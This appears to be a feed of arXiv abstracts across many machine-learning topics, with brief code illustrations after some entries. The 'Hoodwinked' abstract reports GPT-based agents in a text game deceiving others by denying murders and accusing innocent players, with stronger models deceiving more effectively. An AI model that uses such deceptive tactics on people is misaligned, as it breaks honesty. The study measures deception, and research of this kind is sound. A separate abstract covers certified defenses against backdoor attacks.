    An attractive book cover is important for the success of a book. In this paper, we apply Generative Adversarial Networks (GANs) to the book covers domain, using different methods for training in order to obtain better generated images. We interleave GANs with knowledge graphs to alter the input title to obtain multiple possible options for any given title, which are then used as an augmented input to the generator. Finally, we use the discriminator obtained during the training phase to select the best images generated with new titles. Our method performed better at generating book covers than previous attempts, and the knowledge graph gives better options to the book author or editor compared to using GANs alone.
    AnyTeleop: A General Vision-Based Dexterous Robot Arm-Hand Teleoperation System. (arXiv:2307.04577v2 [cs.RO] UPDATED)
    Vision-based teleoperation offers the possibility of endowing robots with human-level intelligence to physically interact with the environment, while requiring only low-cost camera sensors. However, current vision-based teleoperation systems are designed and engineered towards a particular robot model and deployment environment, which scales poorly as the pool of robot models expands and the variety of operating environments increases. In this paper, we propose AnyTeleop, a unified and general teleoperation system supporting multiple different arms, hands, realities, and camera configurations within a single system. Despite being designed to provide great flexibility in the choice of simulators and real hardware, our system still achieves strong performance. In real-world experiments, AnyTeleop outperforms a previous system that was designed for a specific robot hardware, achieving a higher success rate on the same robot. For teleoperation in simulation, AnyTeleop leads to better imitation learning performance than a previous system designed specifically for that simulator. Project page: this http URL
    EmbeddingTree: Hierarchical Exploration of Entity Features in Embedding. (arXiv:2308.01329v1 [cs.LG])
    Embedding learning transforms discrete data entities into continuous numerical representations, encoding the features/properties of the entities. Despite the outstanding performance reported for different embedding learning algorithms, few efforts have been devoted to structurally interpreting how features are encoded in the learned embedding space. This work proposes EmbeddingTree, a hierarchical embedding exploration algorithm that relates the semantics of entity features to the less-interpretable embedding vectors. An interactive visualization tool is also developed based on EmbeddingTree to explore high-dimensional embeddings. The tool helps users discover nuanced features of data entities, perform feature denoising/injecting in embedding training, and generate embeddings for unseen entities. We demonstrate the efficacy of EmbeddingTree and our visualization tool through embeddings generated for industry-scale merchant data and the public 30Music listening/playlists dataset.
    Statistical Estimation Under Distribution Shift: Wasserstein Perturbations and Minimax Theory. (arXiv:2308.01853v1 [stat.ML])
    Distribution shifts are a serious concern in modern statistical learning as they can systematically change the properties of the data away from the truth. We focus on Wasserstein distribution shifts, where every data point may undergo a slight perturbation, as opposed to the Huber contamination model where a fraction of observations are outliers. We formulate and study shifts beyond independent perturbations, exploring Joint Distribution Shifts, where the per-observation perturbations can be coordinated. We analyze several important statistical problems, including location estimation, linear regression, and non-parametric density estimation. Under a squared loss for mean estimation and prediction error in linear regression, we find the exact minimax risk, a least favorable perturbation, and show that the sample mean and least squares estimators are respectively optimal. This holds for both independent and joint shifts, but the least favorable perturbations and minimax risks differ. For other problems, we provide nearly optimal estimators and precise finite-sample bounds. We also introduce several tools for bounding the minimax risk under distribution shift, such as a smoothing technique for location families, and generalizations of classical tools including least favorable sequences of priors, the modulus of continuity, Le Cam's, Fano's, and Assouad's methods.
    RAB: Provable Robustness Against Backdoor Attacks. (arXiv:2003.08904v8 [cs.LG] UPDATED)
    Recent studies have shown that deep neural networks (DNNs) are vulnerable to adversarial attacks, including evasion and backdoor (poisoning) attacks. On the defense side, there have been intensive efforts on improving both empirical and provable robustness against evasion attacks; however, the provable robustness against backdoor attacks still remains largely unexplored. In this paper, we focus on certifying the machine learning model robustness against general threat models, especially backdoor attacks. We first provide a unified framework via randomized smoothing techniques and show how it can be instantiated to certify the robustness against both evasion and backdoor attacks. We then propose the first robust training process, RAB, to smooth the trained model and certify its robustness against backdoor attacks. We prove the robustness bound for machine learning models trained with RAB and prove that our robustness bound is tight. In addition, we theoretically show that it is possible to train the robust smoothed models efficiently for simple models such as K-nearest neighbor classifiers, and we propose an exact smooth-training algorithm that eliminates the need to sample from a noise distribution for such models. Empirically, we conduct comprehensive experiments for different machine learning (ML) models such as DNNs, support vector machines, and K-NN models on MNIST, CIFAR-10, and ImageNette datasets and provide the first benchmark for certified robustness against backdoor attacks. In addition, we evaluate K-NN models on a spambase tabular dataset to demonstrate the advantages of the proposed exact algorithm. Both the theoretic analysis and the comprehensive evaluation on diverse ML models and datasets shed light on further robust learning strategies against general training time attacks.
    A Novel Convolutional Neural Network Architecture with a Continuous Symmetry. (arXiv:2308.01621v1 [cs.CV])
    This paper introduces a new Convolutional Neural Network (ConvNet) architecture inspired by a class of partial differential equations (PDEs) called quasi-linear hyperbolic systems. With comparable performance on the image classification task, it allows for the modification of the weights via a continuous group of symmetries. This is a significant shift from traditional models where the architecture and weights are essentially fixed. We wish to promote (internal) symmetry as a new desirable property for a neural network, and to draw the broader Deep Learning community's attention to the PDE perspective in analyzing and interpreting ConvNets.
    Matrix Estimation for Individual Fairness. (arXiv:2302.02096v2 [cs.LG] UPDATED)
    In recent years, multiple notions of algorithmic fairness have arisen. One such notion is individual fairness (IF), which requires that individuals who are similar receive similar treatment. In parallel, matrix estimation (ME) has emerged as a natural paradigm for handling noisy data with missing values. In this work, we connect the two concepts. We show that pre-processing data using ME can improve an algorithm's IF without sacrificing performance. Specifically, we show that using a popular ME method known as singular value thresholding (SVT) to pre-process the data provides a strong IF guarantee under appropriate conditions. We then show that, under analogous conditions, SVT pre-processing also yields estimates that are consistent and approximately minimax optimal. As such, the ME pre-processing step does not, under the stated conditions, increase the prediction error of the base algorithm, i.e., does not impose a fairness-performance trade-off. We verify these results on synthetic and real data.
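For reference, singular value thresholding itself is simple to state; below is a generic numpy sketch of SVT pre-processing (the threshold `tau` and the toy rank-1 data are illustrative assumptions, not the paper's tuned procedure):

```python
import numpy as np

def svt(M, tau):
    """Singular value thresholding: soft-threshold the singular values
    of M by tau, yielding a low-rank, denoised estimate of M."""
    U, s, Vt = np.linalg.svd(M, full_matrices=False)
    s_thr = np.maximum(s - tau, 0.0)   # shrink; small singular values vanish
    return (U * s_thr) @ Vt

rng = np.random.default_rng(0)
low_rank = np.outer(rng.normal(size=50), rng.normal(size=20))  # rank-1 signal
noisy = low_rank + 0.1 * rng.normal(size=(50, 20))             # noisy observation
denoised = svt(noisy, tau=2.0)
```

Because the small, noise-dominated singular values are zeroed out, the pre-processed matrix is low-rank, which is what underlies the smoothness (and hence individual-fairness) guarantee discussed above.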
    How many preprints have actually been printed and why: a case study of computer science preprints on arXiv. (arXiv:2308.01899v1 [cs.DL])
    Preprints play an increasingly critical role in academic communities. There are many reasons driving researchers to post their manuscripts to preprint servers before formal submission to journals or conferences, but the use of preprints has also sparked considerable controversy, especially surrounding the claim of priority. In this paper, a case study of computer science preprints submitted to arXiv from 2008 to 2017 is conducted to quantify how many preprints have eventually been printed in peer-reviewed venues. Among those published manuscripts, some are published under different titles and without an update to their preprints on arXiv. For these manuscripts, the traditional fuzzy matching method is incapable of mapping the preprint to the final published version. In view of this issue, we introduce a semantics-based mapping method employing Bidirectional Encoder Representations from Transformers (BERT). With this new mapping method and a plurality of data sources, we find that 66% of all sampled preprints are published under unchanged titles and 11% are published under different titles and with other modifications. A further analysis was then performed to investigate why these preprints, but not others, were accepted for publication. Our comparison reveals that in the field of computer science, published preprints feature adequate revisions, multiple authorship, detailed abstracts and introductions, extensive and authoritative references, and available source code.
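The semantics-based mapping boils down to comparing embedding vectors; the toy sketch below uses made-up three-dimensional vectors as stand-ins for BERT embeddings, simply to show the cosine-similarity matching step:

```python
import numpy as np

def cosine_sim(a, b):
    """Cosine similarity between two embedding vectors."""
    return float(a @ b / (np.linalg.norm(a) * np.linalg.norm(b)))

# Hypothetical embeddings (stand-ins for BERT encodings) of a preprint
# and of two candidate published papers with different titles.
preprint = np.array([0.9, 0.1, 0.3])
candidates = {
    "renamed published version": np.array([0.85, 0.15, 0.35]),
    "unrelated paper":           np.array([0.0, 1.0, 0.0]),
}
best = max(candidates, key=lambda k: cosine_sim(preprint, candidates[k]))
```

In practice a similarity threshold would also be needed to decide that no candidate matches at all; that calibration is omitted here.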
    Tensor Programs IVb: Adaptive Optimization in the Infinite-Width Limit. (arXiv:2308.01814v1 [cs.LG])
    Going beyond stochastic gradient descent (SGD), what new phenomena emerge in wide neural networks trained by adaptive optimizers like Adam? Here we show: The same dichotomy between feature learning and kernel behaviors (as in SGD) holds for general optimizers as well, including Adam -- albeit with a nonlinear notion of "kernel." We derive the corresponding "neural tangent" and "maximal update" limits for any architecture. Two foundational advances underlie the above results: 1) A new Tensor Program language, NEXORT, that can express how adaptive optimizers process gradients into updates. 2) The introduction of bra-ket notation to drastically simplify expressions and calculations in Tensor Programs. This work summarizes and generalizes all previous results in the Tensor Programs series of papers.
    Successor Feature Neural Episodic Control. (arXiv:2111.03110v2 [cs.LG] UPDATED)
    A longstanding goal in reinforcement learning is to build intelligent agents that show fast learning and flexible transfer of skills akin to humans and animals. This paper investigates the integration of two frameworks for tackling those goals: episodic control and successor features. Episodic control is a cognitively inspired approach relying on episodic memory, an instance-based memory model of an agent's experiences. Meanwhile, successor features and generalized policy improvement (SF&GPI) form a meta- and transfer-learning framework that allows policies learned for one task to be efficiently reused for later tasks with different reward functions. Individually, these two techniques have shown impressive results in vastly improving sample efficiency and elegantly reusing previously learned policies. We thus outline a combination of both approaches in a single reinforcement learning framework and empirically illustrate its benefits.
    Merging satellite and gauge-measured precipitation using LightGBM with an emphasis on extreme quantiles. (arXiv:2302.03606v2 [eess.SP] UPDATED)
    Knowing the actual precipitation in space and time is critical in hydrological modelling applications, yet spatial coverage with rain gauge stations is limited due to economic constraints. Gridded satellite precipitation datasets offer an alternative for estimating actual precipitation by covering large areas uniformly, albeit with less accurate estimates. To improve precipitation estimates, machine learning is applied to merge rain gauge-based measurements and gridded satellite precipitation products. In this context, observed precipitation plays the role of the dependent variable, while satellite data play the role of predictor variables. Random forests are the dominant machine learning algorithm in relevant applications. In these spatial prediction settings, point predictions (mostly the mean or the median of the conditional distribution) of the dependent variable are issued. The aim of this manuscript is to solve the problem of probabilistic prediction of precipitation, with an emphasis on extreme quantiles, in spatial interpolation settings. We propose issuing probabilistic spatial predictions of precipitation using the Light Gradient Boosting Machine (LightGBM), a boosting algorithm highlighted by prize-winning entries in prediction and forecasting competitions. To assess LightGBM, we contribute a large-scale application that merges daily precipitation measurements in the contiguous US with PERSIANN and GPM-IMERG satellite precipitation data. We focus on extreme quantiles of the probability distribution of the dependent variable, where LightGBM outperforms quantile regression forests (QRF, a variant of random forests) in terms of quantile score at extreme quantiles. Our study offers insight into probabilistic predictions in spatial settings using machine learning.
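Concretely, quantile prediction at level alpha amounts to minimizing the pinball (quantile) loss, the objective LightGBM uses when configured for quantile regression; a pure-numpy sketch (the toy data and grid search are illustrative, not the paper's experimental setup):

```python
import numpy as np

def pinball_loss(y_true, y_pred, alpha):
    """Quantile (pinball) loss at level alpha. Asymmetric: under-prediction
    is penalized with weight alpha, over-prediction with weight (1 - alpha)."""
    diff = y_true - y_pred
    return np.mean(np.maximum(alpha * diff, (alpha - 1) * diff))

# Minimizing the empirical pinball loss over a constant predictor recovers
# the empirical alpha-quantile of the sample.
y = np.array([0.0, 1.0, 2.0, 3.0, 100.0])  # heavy right tail, like daily rainfall
grid = np.linspace(0.0, 100.0, 10001)
losses = [pinball_loss(y, c, alpha=0.95) for c in grid]
best = grid[int(np.argmin(losses))]        # the empirical 0.95-quantile here is 100.0
```

The asymmetric weighting is why a high-alpha model is pushed toward the extreme upper tail of the precipitation distribution, which is exactly the regime the abstract emphasizes.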
    From Latent Graph to Latent Topology Inference: Differentiable Cell Complex Module. (arXiv:2305.16174v2 [cs.LG] UPDATED)
    Latent Graph Inference (LGI) relaxed the reliance of Graph Neural Networks (GNNs) on a given graph topology by learning it dynamically. However, most LGI methods assume access to a (noisy, incomplete, improvable, ...) input graph to rewire, and can only learn regular graph topologies. In the wake of the success of Topological Deep Learning (TDL), we study Latent Topology Inference (LTI) for learning higher-order cell complexes (with sparse, non-regular topology) describing multi-way interactions between data points. To this aim, we introduce the Differentiable Cell Complex Module (DCM), a novel learnable function that computes cell probabilities in the complex to improve the downstream task. We show how to integrate DCM with cell complex message-passing network layers and train it in an end-to-end fashion, thanks to a two-step inference procedure that avoids an exhaustive search across all possible cells in the input, thus maintaining scalability. Our model is tested on several homophilic and heterophilic graph datasets and is shown to outperform other state-of-the-art techniques, offering significant improvements especially in cases where an input graph is not provided.
    A digital twin framework for civil engineering structures. (arXiv:2308.01445v1 [math.NA])
    The digital twin concept represents an appealing opportunity to advance condition-based and predictive maintenance paradigms for civil engineering systems, thus allowing reduced lifecycle costs, increased system safety, and increased system availability. This work proposes a predictive digital twin approach to the health monitoring, maintenance, and management planning of civil engineering structures. The asset-twin coupled dynamical system is encoded employing a probabilistic graphical model, which allows all relevant sources of uncertainty to be taken into account. In particular, the time-repeating observations-to-decisions flow is modeled using a dynamic Bayesian network. Real-time structural health diagnostics are provided by assimilating sensed data with deep learning models. The digital twin state is continually updated in a sequential Bayesian inference fashion. This is then exploited to inform the optimal planning of maintenance and management actions within a dynamic decision-making framework. A preliminary offline phase involves the population of training datasets through a reduced-order numerical model and the computation of a health-dependent control policy. The strategy is assessed on two synthetic case studies, involving a cantilever beam and a railway bridge, demonstrating the dynamic decision-making capabilities of health-aware digital twins.
    InterAct: Exploring the Potentials of ChatGPT as a Cooperative Agent. (arXiv:2308.01552v1 [cs.AI])
    This paper delves into the integration of OpenAI's ChatGPT into embodied agent systems, evaluating its performance on an interactive decision-making benchmark. Drawing a parallel to the concept of people assuming roles according to their unique strengths, we introduce InterAct. In this approach, we feed ChatGPT with varied prompts, assigning it numerous roles such as checker and sorter, and then integrate them with the original language model. Our research shows a remarkable success rate of 98% on AlfWorld, which consists of 6 different tasks in a simulated household environment, emphasizing the significance of proficient prompt engineering. The results highlight ChatGPT's competence in comprehending and performing intricate tasks effectively in real-world settings, thus paving the way for further advancements in task planning.
    The Capability of Large Language Models to Measure Psychiatric Functioning. (arXiv:2308.01834v1 [cs.CL])
    This work investigates the capability of Large Language Models (LLMs) explicitly trained on large corpora of medical knowledge (Med-PaLM 2) to predict psychiatric functioning from patient interviews and clinical descriptions without being trained to do so. To assess this, n = 145 depression and n = 115 PTSD assessments and n = 46 clinical case studies across high-prevalence/high-comorbidity disorders (depressive, anxiety, psychotic, trauma- and stress-related, and addictive disorders) were analyzed using prompts to extract estimated clinical scores and diagnoses. Results demonstrate that Med-PaLM 2 is capable of assessing psychiatric functioning across a range of psychiatric conditions, with the strongest performance being the prediction of depression scores based on standardized assessments (accuracy range = 0.80-0.84), which were statistically indistinguishable from human clinical raters, t(1,144) = 1.20, p = 0.23. These results show the potential for general clinical language models to flexibly predict psychiatric risk based on free descriptions of functioning from both patients and clinicians.
    Deep Learning-based surrogate models for parametrized PDEs: handling geometric variability through graph neural networks. (arXiv:2308.01602v1 [math.NA])
    Mesh-based simulations play a key role when modeling complex physical systems that, in many disciplines across science and engineering, require the solution of parametrized time-dependent nonlinear partial differential equations (PDEs). In this context, full order models (FOMs), such as those relying on the finite element method, can reach high levels of accuracy, but often at the cost of computationally intensive simulations. Surrogate models are therefore developed to replace computationally expensive solvers with more efficient ones that strike favorable trade-offs between accuracy and efficiency. This work explores the potential of graph neural networks (GNNs) for simulating time-dependent PDEs in the presence of geometric variability. In particular, we propose a systematic strategy to build surrogate models based on a data-driven time-stepping scheme in which a GNN architecture is used to efficiently evolve the system. Compared to the majority of surrogate models, the proposed approach stands out for its ability to tackle problems with parameter-dependent spatial domains, while simultaneously generalizing to different geometries and mesh resolutions. We assess the effectiveness of the proposed approach through a series of numerical experiments, involving both two- and three-dimensional problems, showing that GNNs can provide a valid alternative to traditional surrogate models in terms of computational efficiency and generalization to new scenarios. We also assess, from a numerical standpoint, the importance of using GNNs rather than classical dense deep neural networks for the proposed framework.
    Exploiting Multi-Label Correlation in Label Distribution Learning. (arXiv:2308.01742v1 [cs.LG])
    Label Distribution Learning (LDL) is a novel machine learning paradigm that assigns a label distribution to each instance. Many LDL methods leverage label correlation during learning to cope with the exponential-sized output space; among these, many exploit the low-rank structure of the label distribution to capture label correlation. However, recent studies have disclosed that label distribution matrices are typically full-rank, posing challenges to works that exploit low-rank label correlation. Note that multi-label matrices are generally low-rank, and low-rank label correlation is widely adopted in the multi-label learning (MLL) literature. Inspired by this, we introduce an auxiliary MLL process in LDL and capture low-rank label correlation on that MLL task rather than on the LDL task itself. In this way, low-rank label correlation is appropriately exploited in our LDL methods. We conduct comprehensive experiments and demonstrate that our methods are superior to existing LDL methods. Moreover, ablation studies justify the advantages of exploiting low-rank label correlation in the auxiliary MLL.
    Online covariance estimation for stochastic gradient descent under Markovian sampling. (arXiv:2308.01481v1 [math.ST])
    We study the online overlapping batch-means covariance estimator for Stochastic Gradient Descent (SGD) under Markovian sampling. We show that the convergence rates of the covariance estimator are $O\big(\sqrt{d}\,n^{-1/8}(\log n)^{1/4}\big)$ and $O\big(\sqrt{d}\,n^{-1/8}\big)$ under state-dependent and state-independent Markovian sampling, respectively, with $d$ representing dimensionality and $n$ denoting the number of observations or SGD iterations. Remarkably, these rates match the best-known convergence rate previously established for the independent and identically distributed (i.i.d.) case by \cite{zhu2021online}, up to logarithmic factors. Our analysis overcomes significant challenges that arise due to Markovian sampling, leading to the introduction of additional error terms and complex dependencies between the blocks of the batch-means covariance estimator. Moreover, we establish the convergence rate for the first four moments of the $\ell_2$ norm of the error of SGD dynamics under state-dependent Markovian data, which holds potential interest as an independent result. To validate our theoretical findings, we provide numerical illustrations to derive confidence intervals for SGD when training linear and logistic regression models under Markovian sampling. Additionally, we apply our approach to tackle the intriguing problem of strategic classification with logistic regression, where adversaries can adaptively modify features during the training process to increase their chances of being classified in a specific target class.
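As background, the (offline) overlapping batch-means construction underlying the online estimator can be sketched as follows; the normalization constant follows one common convention, and the paper's recursive online update is not reproduced here:

```python
import numpy as np

def overlapping_batch_means_cov(X, b):
    """Overlapping batch-means estimator of the long-run covariance of a
    (possibly Markovian-correlated) sequence X of shape (n, d).
    Exact normalization constants vary across references."""
    n, d = X.shape
    xbar = X.mean(axis=0)
    # Means of all length-b overlapping windows, computed via cumulative sums.
    csum = np.vstack([np.zeros(d), np.cumsum(X, axis=0)])
    means = (csum[b:] - csum[:-b]) / b          # shape (n - b + 1, d)
    dev = means - xbar
    return (n * b) / ((n - b) * (n - b + 1)) * dev.T @ dev

rng = np.random.default_rng(0)
X = rng.normal(size=(20000, 1))   # i.i.d. case: true long-run variance is 1
sigma_hat = overlapping_batch_means_cov(X, b=100)
```

Overlapping windows reuse every observation in many batches, which is what makes an online, single-pass variant feasible; the Markovian dependence between blocks is precisely what complicates the convergence analysis described above.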
    Efficiency of First-Order Methods for Low-Rank Tensor Recovery with the Tensor Nuclear Norm Under Strict Complementarity. (arXiv:2308.01677v1 [math.OC])
    We consider convex relaxations for recovering low-rank tensors based on constrained minimization over a ball induced by the tensor nuclear norm, recently introduced in \cite{tensor_tSVD}. We build on a recent line of results that considered convex relaxations for the recovery of low-rank matrices and established that under a strict complementarity condition (SC), both the convergence rate and per-iteration runtime of standard gradient methods may improve dramatically. We develop the appropriate strict complementarity condition for the tensor nuclear norm ball and obtain the following main results under this condition: 1. When the objective to minimize is of the form $f(X)=g(AX)+\langle C,X\rangle$, where $g$ is strongly convex and $A$ is a linear map (e.g., least squares), a quadratic growth bound holds, which implies linear convergence rates for standard projected gradient methods, despite the fact that $f$ need not be strongly convex. 2. For a smooth objective function, when initialized in certain proximity of an optimal solution which satisfies SC, standard projected gradient methods only require SVD computations (for projecting onto the tensor nuclear norm ball) of rank that matches the tubal rank of the optimal solution. In particular, when the tubal rank is constant, this implies nearly linear (in the size of the tensor) runtime per iteration, as opposed to super-linear without further assumptions. 3. For a nonsmooth objective function which admits a popular smooth saddle-point formulation, we derive similar results to the latter for the well-known extragradient method. An additional contribution which may be of independent interest is the rigorous extension of many basic results regarding tensors of arbitrary order, which were previously obtained only for third-order tensors.
    Compressed and distributed least-squares regression: convergence rates with applications to Federated Learning. (arXiv:2308.01358v1 [cs.LG])
In this paper, we investigate the impact of compression on stochastic gradient algorithms for machine learning, a technique widely used in distributed and federated learning. We underline differences in terms of convergence rates between several unbiased compression operators that all satisfy the same condition on their variance, thus going beyond the classical worst-case analysis. To do so, we focus on the case of least-squares regression (LSR) and analyze a general stochastic approximation algorithm for minimizing quadratic functions relying on a random field. We consider weak assumptions on the random field, tailored to the analysis (specifically, expected H\"older regularity), and on the noise covariance, enabling the analysis of various randomizing mechanisms, including compression. We then extend our results to the case of federated learning. More formally, we highlight the impact on the convergence of the covariance $\mathfrak{C}_{\mathrm{ania}}$ of the additive noise induced by the algorithm. We demonstrate that, despite the non-regularity of the stochastic field, the limit variance term scales with $\mathrm{Tr}(\mathfrak{C}_{\mathrm{ania}} H^{-1})/K$ (where $H$ is the Hessian of the optimization problem and $K$ the number of iterations), generalizing the rate for the vanilla LSR case where it is $\sigma^2 \mathrm{Tr}(H H^{-1}) / K = \sigma^2 d / K$ (Bach and Moulines, 2013). Then, we analyze the dependency of $\mathfrak{C}_{\mathrm{ania}}$ on the compression strategy and ultimately its impact on convergence, first in the centralized case, then in two heterogeneous FL frameworks.
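A concrete example of an unbiased compression operator of the kind covered by such a variance condition is rand-k sparsification; this is a standard operator from the compression literature, used here purely for illustration, not necessarily one the paper analyzes:

```python
import random

def rand_k(v, k, seed=None):
    # Unbiased rand-k sparsification: keep k coordinates chosen uniformly
    # at random and rescale them by d/k so that E[C(v)] = v, at the price
    # of added variance (the quantity the paper's analysis tracks).
    rng = random.Random(seed)
    d = len(v)
    keep = set(rng.sample(range(d), k))
    return [v[i] * d / k if i in keep else 0.0 for i in range(d)]

c = rand_k([1.0, -2.0, 3.0, 0.5], k=2, seed=0)   # 2 of 4 coordinates survive, doubled
```

Averaging `rand_k(v, k)` over many seeds recovers `v`, which is the unbiasedness property the abstract refers to.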
    Learning from Data Streams: An Overview and Update. (arXiv:2212.14720v2 [cs.LG] UPDATED)
The literature on machine learning in the context of data streams is vast and growing. However, many of the defining assumptions regarding data-stream learning tasks are too strong to hold in practice, or are even contradictory such that they cannot be met in the contexts of supervised learning. Algorithms are chosen and designed based on criteria which are often not clearly stated, for problem settings not clearly defined, tested in unrealistic settings, and/or in isolation from related approaches in the wider literature. This puts into question the potential for real-world impact of many approaches conceived in such contexts, and risks propagating a misguided research focus. We propose to tackle these issues by reformulating the fundamental definitions and settings of supervised data-stream learning with regard to contemporary considerations of concept drift and temporal dependence; and we take a fresh look at what constitutes a supervised data-stream learning task, and a reconsideration of algorithms that may be applied to tackle such tasks. Reflecting on this formulation and overview, and helped by an informal survey of industrial players dealing with real-world data streams, we provide recommendations. Our main emphasis is that learning from data streams does not impose a single-pass or online-learning approach, or any particular learning regime; and any constraints on memory and time are not specific to streaming. Meanwhile, there exist established techniques for dealing with temporal dependence and concept drift in other areas of the literature. For the data streams community, we thus encourage a shift in research focus: from dealing with often-artificial constraints and assumptions on the learning mode, to issues such as robustness, privacy, and interpretability, which are increasingly relevant to learning in data streams in academic and industrial settings.
MRQ: Support Multiple Quantization Schemes through Model Re-Quantization. (arXiv:2308.01867v1 [cs.LG])
Despite the proliferation of diverse hardware accelerators (e.g., NPU, TPU, DPU), deploying deep learning models on edge devices with fixed-point hardware is still challenging due to complex model quantization and conversion. Existing model quantization frameworks like Tensorflow QAT [1], TFLite PTQ [2], and Qualcomm AIMET [3] support only a limited set of quantization schemes (e.g., only asymmetric per-tensor quantization in TF1.x QAT [4]). Accordingly, deep learning models cannot be easily quantized for diverse fixed-point hardware, mainly due to slightly different quantization requirements. In this paper, we envision a new type of model quantization approach called MRQ (model re-quantization), which takes existing quantized models and quickly transforms them to meet different quantization requirements (e.g., asymmetric -> symmetric, non-power-of-2 scale -> power-of-2 scale). Re-quantization is much simpler than quantizing from scratch because it avoids costly re-training and provides support for multiple quantization schemes simultaneously. To minimize re-quantization error, we developed a new set of re-quantization algorithms including weight correction and rounding error folding. We demonstrate that the MobileNetV2 QAT model [7] can be quickly re-quantized into two different quantization schemes (i.e., symmetric and symmetric+power-of-2 scale) with less than 0.64 units of accuracy loss. We believe our work is the first to leverage this concept of re-quantization for model quantization, and models obtained from the re-quantization process have been successfully deployed on the NNA in Echo Show devices.
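To make the "non-power-of-2 scale -> power-of-2 scale" direction concrete, here is a deliberately minimal sketch: snap a quantized tensor's scale to the nearest power of two and re-round the integer values. The paper's weight-correction and rounding-error-folding algorithms are more sophisticated, and the numbers below are made up for illustration.

```python
import math

def requantize_scale_pow2(q_weights, scale, zero_point=0):
    # Re-quantize an affine-quantized tensor (value = (q - zero_point) * scale)
    # to a symmetric scheme with a power-of-2 scale: snap the scale, then
    # re-round so dequantized values stay close to the originals.
    new_scale = 2.0 ** round(math.log2(scale))          # nearest power of 2
    deq = [(q - zero_point) * scale for q in q_weights]  # back to real values
    new_q = [round(v / new_scale) for v in deq]          # symmetric: zero_point = 0
    return new_q, new_scale

# Hypothetical 4-weight tensor with a non-power-of-2 scale and nonzero zero point.
q, s = requantize_scale_pow2([-3, 0, 5, 12], scale=0.093, zero_point=2)
```

The residual between `q * s` and the original dequantized values is the re-quantization error the paper's correction algorithms try to minimize.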
    Exact identification of nonlinear dynamical systems by Trimmed Lasso. (arXiv:2308.01891v1 [cs.LG])
Identification of nonlinear dynamical systems has been popularized by sparse identification of nonlinear dynamics (SINDy) via the sequentially thresholded least squares (STLS) algorithm. Many extensions of SINDy have emerged in the literature to deal with experimental data which are finite in length and noisy. Recently, the computationally intensive method of ensembling bootstrapped SINDy models (E-SINDy) was proposed for model identification, handling finite, highly noisy data. While the extensions of SINDy are numerous, their sparsity-promoting estimators occasionally provide sparse approximations of the dynamics as opposed to exact recovery. Furthermore, these estimators suffer under multicollinearity, e.g., the irrepresentable condition for the Lasso. In this paper, we demonstrate that the Trimmed Lasso for robust identification of models (TRIM) can provide exact recovery under more severe noise, finite data, and multicollinearity as opposed to E-SINDy. Additionally, the computational cost of TRIM is asymptotically equal to that of STLS, since the sparsity parameter of TRIM can be solved for efficiently by convex solvers. We compare these methodologies on challenging nonlinear systems, specifically the Lorenz 63 system, the Bouc-Wen oscillator from the nonlinear dynamics benchmark of No\"el and Schoukens, 2016, and a time delay system describing tool cutting dynamics. This study emphasizes the comparisons between STLS, reweighted $\ell_1$ minimization, and the Trimmed Lasso in identification with respect to problems faced by practitioners: finite and noisy data, the performance of sparse regression when the library grows in dimension (multicollinearity), and automatic methods for the choice of regularization parameters.
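The STLS baseline at the heart of SINDy is compact enough to sketch: alternate least-squares fits with hard-thresholding of small coefficients. The candidate library, threshold, and toy dynamics below are illustrative choices, not the paper's benchmark systems.

```python
import numpy as np

def stls(Theta, dx, threshold=0.1, iters=10):
    # Sequentially thresholded least squares: fit, zero out coefficients
    # below the threshold, refit on the surviving library columns, repeat.
    xi = np.linalg.lstsq(Theta, dx, rcond=None)[0]
    for _ in range(iters):
        small = np.abs(xi) < threshold
        xi[small] = 0.0
        big = ~small
        if big.any():
            xi[big] = np.linalg.lstsq(Theta[:, big], dx, rcond=None)[0]
    return xi

# Toy identification problem: recover dx = 2*x - 0.5*x^3 from noiseless samples.
rng = np.random.default_rng(0)
x = rng.uniform(-2, 2, size=200)
Theta = np.column_stack([np.ones_like(x), x, x**2, x**3])   # candidate library
dx = 2 * x - 0.5 * x**3
xi = stls(Theta, dx)   # sparse coefficient vector over the library terms
```

On this noiseless toy problem STLS recovers the active terms exactly; the paper's point is that the Trimmed Lasso keeps that exact-recovery behavior under noise and multicollinearity where STLS-style estimators degrade.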
    Multi-variable Hard Physical Constraints for Climate Model Downscaling. (arXiv:2308.01868v1 [physics.ao-ph])
    Global Climate Models (GCMs) are the primary tool to simulate climate evolution and assess the impacts of climate change. However, they often operate at a coarse spatial resolution that limits their accuracy in reproducing local-scale phenomena. Statistical downscaling methods leveraging deep learning offer a solution to this problem by approximating local-scale climate fields from coarse variables, thus enabling regional GCM projections. Typically, climate fields of different variables of interest are downscaled independently, resulting in violations of fundamental physical properties across interconnected variables. This study investigates the scope of this problem and, through an application on temperature, lays the foundation for a framework introducing multi-variable hard constraints that guarantees physical relationships between groups of downscaled climate variables.
    Hoodwinked: Deception and Cooperation in a Text-Based Game for Language Models. (arXiv:2308.01404v1 [cs.CL])
    Are current language models capable of deception and lie detection? We study this question by introducing a text-based game called $\textit{Hoodwinked}$, inspired by $\textit{Mafia}$ and $\textit{Among Us}$. Players are locked in a house and must find a key to escape, but one player is tasked with killing the others. Each time a murder is committed, the surviving players have a natural language discussion then vote to banish one player from the game. We conduct experiments with agents controlled by GPT-3, GPT-3.5, and GPT-4 and find evidence of deception and lie detection capabilities. The killer often denies their crime and accuses others, leading to measurable effects on voting outcomes. More advanced models are more effective killers, outperforming smaller models in 18 of 24 pairwise comparisons. Secondary metrics provide evidence that this improvement is not mediated by different actions, but rather by stronger deception capabilities during discussions. Overall, we find substantial evidence that current language models are capable of deception. To better evaluate the ability of AI agents to deceive humans, we make this game publicly available at https://hoodwinked.ai/ .
    Novel Physics-Based Machine-Learning Models for Indoor Air Quality Approximations. (arXiv:2308.01438v1 [cs.LG])
Cost-effective sensors can capture, in real time, a variety of air-quality-related modalities, from different pollutant concentrations to indoor/outdoor humidity and temperature. Machine learning (ML) models are capable of performing air-quality "ahead-of-time" approximations. Undoubtedly, accurate indoor air quality approximation significantly helps provide a healthy indoor environment, optimize associated energy consumption, and offer human comfort. However, it is crucial to design an ML architecture that captures the domain knowledge, the so-called problem physics. In this study, we propose six novel physics-based ML models for accurate indoor pollutant concentration approximations. The proposed models include an adroit combination of state-space concepts in physics, Gated Recurrent Units, and Decomposition techniques. The proposed models were illustrated using data collected from five offices in a commercial building in California. The proposed models are shown to be less complex, computationally more efficient, and more accurate than similar state-of-the-art transformer-based models. The superiority of the proposed models is due to their relatively light architecture (computational efficiency) and, more importantly, their ability to capture the underlying highly nonlinear patterns embedded in the often contaminated sensor-collected indoor air quality temporal data.
